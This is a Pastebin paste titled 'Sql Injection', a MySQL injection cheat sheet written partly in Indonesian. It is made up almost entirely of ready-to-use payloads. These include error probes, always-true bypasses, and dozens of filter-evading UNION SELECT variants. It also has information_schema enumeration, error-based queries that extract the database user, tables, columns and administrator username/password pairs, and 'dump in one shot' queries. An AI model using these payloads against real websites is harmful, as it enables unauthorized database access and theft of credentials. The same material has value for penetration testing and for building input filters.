API tools faq
paste
Advertisement
Guest User

Sql Injection

a guest
Apr 23rd, 2017
1,177
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.29 KB | None | 0 0
raw download clone embed print report
  1. [~] Chek Eror [~]
  2.  
  3. 01. '
  4. 02. "
  5. 03. or 1=1
  6. 04. and 1=1
  7. 05. and false
  8. 06. and true
  9. • [Single qiotes]
  10. 01. ' or '1'='1
  11. 02. ' and '1'='1
  12. 03. ' and false
  13. 04. ' and true
  14. • [Double quotes]
  15. 01. " or "1"="1
  16. 02. " and "1"="1
  17. 03. " and false
  18. 04. " and true
  19.  
  20. [~]Baypass True Condition[~]
  21.  
  22. or '1
  23. || '1
  24. null' || 'a'=_binary'a
  25. 1' || 'a'=x'61
  26. 1' && '0'=x'30
  27. 1' %26%26 %270%27%3dx'30
  28. 2' && 0.e1=_binary"0
  29. 1 or 1.e1=0b1010
  30. ' || 1 like 1
  31. '-'
  32. "-"
  33. ' || 2 not like 1
  34. 110 or x'30'=48
  35. '1'!=20
  36. 1 or 20!='1'
  37. 2 and 2>0
  38. 3 || 0<1
  39. 12 || 0b1010<0b1011
  40. 0b11 || 0b1010x'30'
  41. 1 or 0b1
  42. 2121/**/||21
  43. 111' or _binary'1
  44. 1 or 2121
  45. 1' or 12 rlike '1
  46.  
  47.  
  48. [~] KOMENTAR [~]
  49.  
  50. 01. -- : MySQL Linux Style
  51. 02. --+ : MySQL Windows Style
  52. 03. # : Hash (URL encode while use)
  53. 04. --+- : SQL Comment
  54. 05. ;%00 : Null Byte
  55. 07. ` : Backtick
  56. 08. -- -
  57. 09. /*
  58. 10. /**/
  59. 11. %23
  60. 12. //
  61.  
  62.  
  63. [~] order by [~]
  64.  
  65. 01. group by -- +
  66. 02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
  67. 03. Procedure Analyse()--+
  68. 04. and (select * from news)=(select 0)--+
  69. 05. /**/ORDER/**/BY/**/
  70. 06. /*!order*/+/*!by*/
  71. 07. /*!ORDER BY*/
  72. 08. /*!50000ORDER BY*/
  73. 09. /*!50000ORDER*//**//*!50000BY*/
  74. 10. /*!12345ORDER*/+/*!BY*/
  75.  
  76.  
  77. [~] UNION select [~]
  78.  
  79. 01. (uNioN)+(sElECt)….
  80. 02. (uNioN+SeleCT)+…
  81. 03. (UnI)(oN)+(SeL)(ecT)+….
  82. 04. union (select 1,2,3,4…)
  83. 05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  84. 06. %55nion(%53elect 1,2,3)-- -
  85. 07. +union+distinct+select+
  86. 08. +union+distinctROW+select+
  87. 09. /**//*!12345UNION SELECT*//**/
  88. 10. /**//*!50000UNION SELECT*//**/
  89. 11. /**/UNION/**//*!50000SELECT*//**/
  90. 12. /*!50000UniON SeLeCt*/
  91. 13. union /*!50000%53elect*/
  92. 14. +#uNiOn+#sEleCt
  93. 15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  94. 16. /*!%55NiOn*/ /*!%53eLEct*/
  95. 17. /*!u%6eion*/ /*!se%6cect*/
  96. 18. +un/**/ion+se/**/lect
  97. 19. uni%0bon+se%0blect
  98. 20. %2f**%2funion%2f**%2fselect
  99. 21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  100. 22. REVERSE(noinu)+REVERSE(tceles)
  101. 24. /*--*/union/*--*/select/*--*/
  102. 25. union (/*!/**/ SeleCT */ 1,2,3)
  103. 26. /*!union*/+/*!select*/
  104. 27. union+/*!select*/
  105. 28. /**/union/**/select/**/
  106. 29. /**/uNIon/**/sEleCt/**/
  107. 30. +%2F**/+Union/*!select*/
  108. 31. /**//*!union*//**//*!select*//**/
  109. 32. /*!uNIOn*/ /*!SelECt*/
  110. 33. +union+distinct+select+
  111. 34. +union+distinctROW+select+
  112. 35. uNiOn aLl sElEcT
  113. 36. UNIunionON+SELselectECT
  114. /**/union/*!50000select*//**/
  115. 0%a0union%a0select%09
  116. %0Aunion%0Aselect%0A
  117. %55nion/**/%53elect
  118. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  119. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  120. %0A%09UNION%0CSELECT%10NULL%
  121. /*!union*//*--*//*!all*//*--*//*!select*/
  122. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  123. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  124. +UnIoN/*&a=*/SeLeCT/*&a=*/
  125. union+sel%0bect
  126. +uni*on+sel*ect+
  127. +#1q%0Aunion all#qa%0A#%0Aselect
  128. union(select (1),(2),(3),(4),(5))
  129. UNION(SELECT(column)FROM(table))
  130. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  131. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  132. union(select(1),2,3)
  133. union (select 1111,2222,3333)
  134. uNioN (/*!/**/ SeleCT */ 11)
  135. union (select 1111,2222,3333)
  136. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  137. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  138. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  139. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  140. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  141. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  142. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  143. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  144. /union\sselect/g
  145. /union\s+select/i
  146. /*!UnIoN*/SeLeCT
  147. +UnIoN/*&a=*/SeLeCT/*&a=*/
  148. +uni>on+sel>ect+
  149. +(UnIoN)+(SelECT)+
  150. +(UnI)(oN)+(SeL)(EcT)
  151. +’UnI”On’+'SeL”ECT’
  152. +uni on+sel ect+
  153. +/*!UnIoN*/+/*!SeLeCt*/+
  154. /*!u%6eion*/ /*!se%6cect*/
  155. uni%20union%20/*!select*/%20
  156. union%23aa%0Aselect
  157. /**/union/*!50000select*/
  158. /^.*union.*$/ /^.*select.*$/
  159. /*union*/union/*select*/select+
  160. /*uni X on*/union/*sel X ect*/
  161. +un/**/ion+sel/**/ect+
  162. +UnIOn%0d%0aSeleCt%0d%0a
  163. UNION/*&test=1*/SELECT/*&pwn=2*/
  164. un?<ion sel="">+un/**/ion+se/**/lect+
  165. +UNunionION+SEselectLECT+
  166.  
  167. +uni%0bon+se%0blect+
  168. %252f%252a*/union%252f%252a /select%252f%252a*/
  169. /%2A%2A/union/%2A%2A/select/%2A%2A/
  170. %2f**%2funion%2f**%2fselect%2f**%2f
  171. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  172. /*!UnIoN*/SeLecT+
  173.  
  174. [~] information_schema.tables [~]
  175.  
  176. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  177. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  178. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  179. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  180. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  181. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  182.  
  183. [~] concat() [~]
  184.  
  185. CoNcAt()
  186. concat()
  187. CON%08CAT()
  188. CoNcAt()
  189. %0AcOnCat()
  190. /**//*!12345cOnCat*/
  191. /*!50000cOnCat*/(/*!*/)
  192. unhex(hex(concat(table_name)))
  193. unhex(hex(/*!12345concat*/(table_name)))
  194. unhex(hex(/*!50000concat*/(table_name)))
  195.  
  196. [~] group_concat() [~]
  197.  
  198. /*!group_concat*/()
  199. gRoUp_cOnCAt()
  200. group_concat(/*!*/)
  201. group_concat(/*!12345table_name*/)
  202. group_concat(/*!50000table_name*/)
  203. /*!group_concat*/(/*!12345table_name*/)
  204. /*!group_concat*/(/*!50000table_name*/)
  205. /*!12345group_concat*/(/*!12345table_name*/)
  206. /*!50000group_concat*/(/*!50000table_name*/)
  207. /*!GrOuP_ConCaT*/()
  208. /*!12345GroUP_ConCat*/()
  209. /*!50000gRouP_cOnCaT*/()
  210. /*!50000Gr%6fuP_c%6fnCAT*/()
  211. unhex(hex(group_concat(table_name)))
  212. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  213. unhex(hex(/*!12345group_concat*/(table_name)))
  214. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  215. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  216. unhex(hex(/*!50000group_concat*/(table_name)))
  217. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  218. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  219. convert(group_concat(table_name)+using+ascii)
  220. convert(group_concat(/*!table_name*/)+using+ascii)
  221. convert(group_concat(/*!12345table_name*/)+using+ascii)
  222. convert(group_concat(/*!50000table_name*/)+using+ascii)
  223. CONVERT(group_concat(table_name)+USING+latin1)
  224. CONVERT(group_concat(table_name)+USING+latin2)
  225. CONVERT(group_concat(table_name)+USING+latin3)
  226. CONVERT(group_concat(table_name)+USING+latin4)
  227. CONVERT(group_concat(table_name)+USING+latin5)
  228.  
  229. [~] Eror based [~]
  230.  
  231. • Chek versi
  232. = and (select * from (select name_const(version(),1),name_const(version(),1))a)
  233. • Chek user
  234. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  235. • Chek database
  236. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  237. • Chek Table
  238. = and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  239. • Chek Column
  240. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  241. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  242. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  243.  
  244. • Dump data
  245. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  246. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  247.  
  248.  
  249. [~] Using Xpath [~]
  250. 01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--
  251.  
  252. [~]DIOS[~]
  253.  
  254. 01. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
  255. 02. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  256. 03. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  257. 04. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
  258. 05. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!